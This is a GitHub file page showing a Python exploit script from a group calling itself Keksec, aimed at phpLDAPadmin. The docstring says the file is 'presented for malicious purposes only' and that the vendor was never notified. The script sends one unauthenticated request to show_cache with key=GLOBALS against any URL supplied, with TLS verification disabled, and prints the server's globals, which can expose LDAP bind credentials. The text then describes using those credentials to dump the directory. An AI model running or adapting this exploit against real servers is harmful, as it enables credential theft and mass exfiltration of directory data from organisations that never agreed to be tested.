-
Notifications
You must be signed in to change notification settings - Fork 7
/
Copy pathkek-exploit.py
executable file
·59 lines (51 loc) · 3.68 KB
/
kek-exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
KEK KOMMUNIKATIONS BRINGS YOU...
█████ ████ █████
░░███ ███░ ░░███
░███ ███ ██████ ░███ █████ █████ ██████ ██████
░███████ ███░░███ ░███░░███ ███░░ ███░░███ ███░░███
░███░░███ ░███████ ░██████░ ░░█████ ░███████ ░███ ░░░
░███ ░░███ ░███░░░ ░███░░███ ░░░░███░███░░░ ░███ ███
█████ ░░████░░██████ ████ █████ ██████ ░░██████ ░░██████
░░░░░ ░░░░ ░░░░░░ ░░░░ ░░░░░ ░░░░░░ ░░░░░░ ░░░░░░
INNOVATORS IN KEK─BASED TEKNOLOGY
EXPERTS IN RESPONSIBLE DISCLOSURE
GENERAL ALL-AROUND COOL D00DZ
╔═══════════════╗
║phpldapadmin.py║
╒═─═─═─═─═─═─═─═─═╩─═─═─═─═─═─═─═─╩═─═─═─═─═─═─═─═─═╕
┃ This file is presented for malicious purposes ┃
┃ only. Keksec takes no responsibility for ┃
┃ the use of the information in this file by ┃
┃ shit-eating whitehats, or for the patching of ┃
┃ any vulnerabilities disclosed in this file by ┃
┃ butthurt SWEs. ┃
╘═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═╛
phpLDAPadmin is a web interface for interacting with LDAP servers. LDAP
is "an open, vendor-neutral, industry standard application protocol for
accessing and maintaining distributed directory information services
over an Internet Protocol (IP) network." Basically it is a protocol for
accessing directory services, which can contain very, very juicy stuff.
phpLDAPadmin had its last stable release in 2013, but many big companies
still use it (see SCLGroup, affiliated with Cambridge Analytica).
This script exploits overlooked access control in show_cache.php, which
should not be accessible to unauthenticated users. We use it to do a
var_dump of $GLOBALS which can result in disclosure of bind_id and
bind_pass, which can then be used to either dump the directory over LDAP
with something like ldapsearch, or just log in to the web interface and
export the data.
Public Disclosure Timeline:
Found: a while ago
Contacted vendor: lol no
Disclosed publicly: today
"""
import requests, sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
if len(sys.argv) != 2:
sys.stderr.write("\x1B[31mSyntax: " + sys.argv[0] + " <url>\x1B[0m\n")
exit(0)
PATH = "cmd.php?cmd=show_cache&global=HACKTHEPLANET&key=GLOBALS"
print requests.get(sys.argv[1] + PATH, verify=False).content